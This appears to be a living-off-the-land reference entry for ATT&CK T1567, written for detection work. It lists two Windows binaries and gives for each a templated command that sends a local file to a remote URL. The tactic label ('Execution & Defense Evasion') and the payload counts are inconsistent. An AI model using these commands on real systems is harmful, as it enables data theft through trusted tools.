T1567Tactic: Execution & Defense EvasionOfficial MITRE ATT&CK Page

T1567: Technique T1567

Adversaries may leverage living-off-the-land techniques (T1567) to achieve execution, evade defenses, or transfer tools.

Total Capable Binaries: 2
Windows: 2
Linux: 0
macOS: 0

Living-off-the-Land Matrix for T1567

Across 2 verified binaries
Windows2 payloads

ConfigSecurityPolicy.exe

Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Sample Attack Vector:
ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}
Windows1 payloads

DataSvcUtil.exe

DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.

Sample Attack Vector:
DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point